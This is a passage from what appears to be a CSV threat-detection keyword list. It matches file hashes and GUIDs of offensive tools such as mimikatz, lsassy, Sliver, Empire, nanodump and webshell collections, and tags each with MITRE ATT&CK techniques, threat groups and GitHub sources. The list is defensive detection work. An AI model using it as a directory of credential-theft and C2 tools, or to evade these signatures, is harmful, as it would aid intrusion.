tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","#filehash","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","23137" "*21870c033ee041fa83e39818f3f23a51c1f994344f15f1f2b95912c013ad77ff*",".{0,1000}21870c033ee041fa83e39818f3f23a51c1f994344f15f1f2b95912c013ad77ff.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","23139" "*2189fb112297e59da398ea1b3e4bfa997d6af054c7b365a1c60864515fc6807e*",".{0,1000}2189fb112297e59da398ea1b3e4bfa997d6af054c7b365a1c60864515fc6807e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23140" "*219a4c8a8686b08c5f7d98b1386d4445e501b89404fc8dba6abd47bb271d640a*",".{0,1000}219a4c8a8686b08c5f7d98b1386d4445e501b89404fc8dba6abd47bb271d640a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23141" "*21a7803ec85cae6362c0ad25529e21ca76783570b93bacbe64d0502aef852b2f*",".{0,1000}21a7803ec85cae6362c0ad25529e21ca76783570b93bacbe64d0502aef852b2f.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","23142" "*21af546e3eedebde001b961737c7c3d152d145baf1784c62690211c568a17da7*",".{0,1000}21af546e3eedebde001b961737c7c3d152d145baf1784c62690211c568a17da7.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","23143" "*21b39873efe2560fc0c665814a00ce67c8f24ea170bf8cc14d19ccf9d46e6173*",".{0,1000}21b39873efe2560fc0c665814a00ce67c8f24ea170bf8cc14d19ccf9d46e6173.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23146" "*21c01746c200094f58a104a378b055484d3230adf28e44a60608834e945643b0*",".{0,1000}21c01746c200094f58a104a378b055484d3230adf28e44a60608834e945643b0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23147" "*21c1f56c071851f53f1b27dfe85fed9bd7da3141a9d80f665be59d370f761b34*",".{0,1000}21c1f56c071851f53f1b27dfe85fed9bd7da3141a9d80f665be59d370f761b34.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23148" "*21c56f056bbf9526c9e4b73407ddac030dd9379bc4fa2813ac28662446567faf*",".{0,1000}21c56f056bbf9526c9e4b73407ddac030dd9379bc4fa2813ac28662446567faf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23149" "*21c62294d438c1c391ebb39ec2540c9c3af515e656f395624ad9dbdbd214308d*",".{0,1000}21c62294d438c1c391ebb39ec2540c9c3af515e656f395624ad9dbdbd214308d.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","23150" "*21c6b8cc941e0aa80e42c28dbaacec63f8ae187b1d689a9fd40616ea612dd931*",".{0,1000}21c6b8cc941e0aa80e42c28dbaacec63f8ae187b1d689a9fd40616ea612dd931.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23151" "*21c6e03b7a1e354d984e88080e3843f7fbd71df02fc91df92f99d4f8a11c5ea0*",".{0,1000}21c6e03b7a1e354d984e88080e3843f7fbd71df02fc91df92f99d4f8a11c5ea0.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","23152" "*21c9869676708d67b55fe9f17c7c43fadaf3a9b27bf013b9bb0ba673d70da013*",".{0,1000}21c9869676708d67b55fe9f17c7c43fadaf3a9b27bf013b9bb0ba673d70da013.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","#filehash","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","23153" 
"*21ca06b18698d14154a45822aaae1e3837d168cc7630bcd3ec3d8c68aaa959e6*",".{0,1000}21ca06b18698d14154a45822aaae1e3837d168cc7630bcd3ec3d8c68aaa959e6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23154" "*21d9bf55a6482b64b95791d7b90e8cc3aa1c3c133be82650daff5df113643b66*",".{0,1000}21d9bf55a6482b64b95791d7b90e8cc3aa1c3c133be82650daff5df113643b66.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","23157" "*21db0a4b79dc31e1a31251fd69d793e6dd4839e3a869093f8abd8bc10aa4b7fb*",".{0,1000}21db0a4b79dc31e1a31251fd69d793e6dd4839e3a869093f8abd8bc10aa4b7fb.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","23158" "*21dc78b6f950f4eae598993c27ff7af3528ae7b7a7bcc8126a691c4c6c65efc5*",".{0,1000}21dc78b6f950f4eae598993c27ff7af3528ae7b7a7bcc8126a691c4c6c65efc5.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23159" "*21f131f283dffa84c44aa6c4c62bb97b77c8de8a08fb6ba50a449bdf9fa8bd46*",".{0,1000}21f131f283dffa84c44aa6c4c62bb97b77c8de8a08fb6ba50a449bdf9fa8bd46.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","23161" "*21f37987d11f82d9a0b38b6caca5b5c7967172f3204c8ecc98cb3a5033097467*",".{0,1000}21f37987d11f82d9a0b38b6caca5b5c7967172f3204c8ecc98cb3a5033097467.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - 
Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","23162" "*21f59168d9679a4567facac1b9146c930bc5e47c7c5ad248ed9e4e4582c25008*",".{0,1000}21f59168d9679a4567facac1b9146c930bc5e47c7c5ad248ed9e4e4582c25008.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","0","#filehash","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","23164" "*21f65143eef8b914b4b044ed3bbd518e05f5d8d08e326cf62e0f63e32de8a73f*",".{0,1000}21f65143eef8b914b4b044ed3bbd518e05f5d8d08e326cf62e0f63e32de8a73f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23165" "*21f7c3a31ac72448d1e1aa4624672d7c3f7644fe7598ff109f2f87fd8de48cd7*",".{0,1000}21f7c3a31ac72448d1e1aa4624672d7c3f7644fe7598ff109f2f87fd8de48cd7.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","23166" "*21fc92b2d8e6c439a04cb584d0b33c49e6c9460d754429795f3c7de68777772c*",".{0,1000}21fc92b2d8e6c439a04cb584d0b33c49e6c9460d754429795f3c7de68777772c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23168" "*21fd3f69a45a2eeb1354cfb8e4b44c6d07cd30bf91698ac5831fbb13846f3f56*",".{0,1000}21fd3f69a45a2eeb1354cfb8e4b44c6d07cd30bf91698ac5831fbb13846f3f56.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","23169" "*21fd88a16e0aa75cc0d7e4f814cbb33e57de921ab5648f94a949318023fdec7d*",".{0,1000}21fd88a16e0aa75cc0d7e4f814cbb33e57de921ab5648f94a949318023fdec7d.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#filehash","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","23170" "*21fff74c2464be8072328345721555138aed7e15adc531ae4f244820a0f3061f*",".{0,1000}21fff74c2464be8072328345721555138aed7e15adc531ae4f244820a0f3061f.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on 
compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","23171" "*22020898-6F0D-4D71-B14D-CB5897C5A6AA*",".{0,1000}22020898\-6F0D\-4D71\-B14D\-CB5897C5A6AA.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","0","#GUIDproject","N/A","4","2","105","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z","23172" "*2202732c2585283f93fca9bee4c3f3709530fa450a1bea8bfb925768f38b2bb9*",".{0,1000}2202732c2585283f93fca9bee4c3f3709530fa450a1bea8bfb925768f38b2bb9.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","23173" "*22048db7a9a636d9bebbce5d6e883f87942a5fe9546341bf66d234b89772df4b*",".{0,1000}22048db7a9a636d9bebbce5d6e883f87942a5fe9546341bf66d234b89772df4b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23174" "*2204d8a72a2aeabf19965bb8590d8ea9f959b07375672745a52eaa81814fe531*",".{0,1000}2204d8a72a2aeabf19965bb8590d8ea9f959b07375672745a52eaa81814fe531.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use 
SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23175" "*220922e65b5b988f62cd1390f7240ccfa0d8c71e7cfe3d3e6c84ee04a37c9910*",".{0,1000}220922e65b5b988f62cd1390f7240ccfa0d8c71e7cfe3d3e6c84ee04a37c9910.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","23177" "*2209de0546bd10397e30fa70f9c04a6730bdeddd610ef7fbee491ed86a881c95*",".{0,1000}2209de0546bd10397e30fa70f9c04a6730bdeddd610ef7fbee491ed86a881c95.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23178" "*220dea762dec11fe8d6a5b7a24b6af9e4b72dfc084e2b1b835ab661323486ecc*",".{0,1000}220dea762dec11fe8d6a5b7a24b6af9e4b72dfc084e2b1b835ab661323486ecc.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - 
TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","#filehash","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","23179" "*220f7d90df81af2d014e7dc80d6b6705b6b8f1013ca9938076a3bac88f6cae7d*",".{0,1000}220f7d90df81af2d014e7dc80d6b6705b6b8f1013ca9938076a3bac88f6cae7d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23180" "*220fc01ba29a57c350860f685caf64d84175f214dd84a43cc16c577fa53c9308*",".{0,1000}220fc01ba29a57c350860f685caf64d84175f214dd84a43cc16c577fa53c9308.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","23181" "*22101aecc2195c323fdd0d949014c993790c425693f60c2bbc2138b4a830a519*",".{0,1000}22101aecc2195c323fdd0d949014c993790c425693f60c2bbc2138b4a830a519.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - 
Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23182" "*22101aecc2195c323fdd0d949014c993790c425693f60c2bbc2138b4a830a519*",".{0,1000}22101aecc2195c323fdd0d949014c993790c425693f60c2bbc2138b4a830a519.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23183" "*221986c87ed18ec810267b11b919766d2d556127d9a4f2b16f544b39a32c8573*",".{0,1000}221986c87ed18ec810267b11b919766d2d556127d9a4f2b16f544b39a32c8573.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - 
T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","23185" "*221ac33db7069624a6840a57b5adb7ed34ee49f911b200aa4c5d15cea7ebaf69*",".{0,1000}221ac33db7069624a6840a57b5adb7ed34ee49f911b200aa4c5d15cea7ebaf69.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","23186" "*221ca3050fc71ed69e11ba092468ca4a99220e3dbb23e5c7d37b3f15a77b02e7*",".{0,1000}221ca3050fc71ed69e11ba092468ca4a99220e3dbb23e5c7d37b3f15a77b02e7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23187" "*223068bbe721dda949ae91d8260b2c7ee7b991c409be7d909841874c37c4f073*",".{0,1000}223068bbe721dda949ae91d8260b2c7ee7b991c409be7d909841874c37c4f073.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23191" 
"*223279bb628165de88609c81444f4a9bf9aac6f921ea155ac427a47d13b49084*",".{0,1000}223279bb628165de88609c81444f4a9bf9aac6f921ea155ac427a47d13b49084.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","0","#filehash","N/A","9","1","37","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z","23192" "*22348216348f97cfb574f25a1528cf1a766ccb1e70d33961a6f1b6cf4feff23c*",".{0,1000}22348216348f97cfb574f25a1528cf1a766ccb1e70d33961a6f1b6cf4feff23c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23193" "*2235cb273649d86f24c4d843a9a637b44e528643a73ff9f6013c446df18c430c*",".{0,1000}2235cb273649d86f24c4d843a9a637b44e528643a73ff9f6013c446df18c430c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23194" "*2236b69f5c5c266ca57af9f9a2fddd35a36b4dd4de5ee279f87d2bf2e769bc81*",".{0,1000}2236b69f5c5c266ca57af9f9a2fddd35a36b4dd4de5ee279f87d2bf2e769bc81.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - 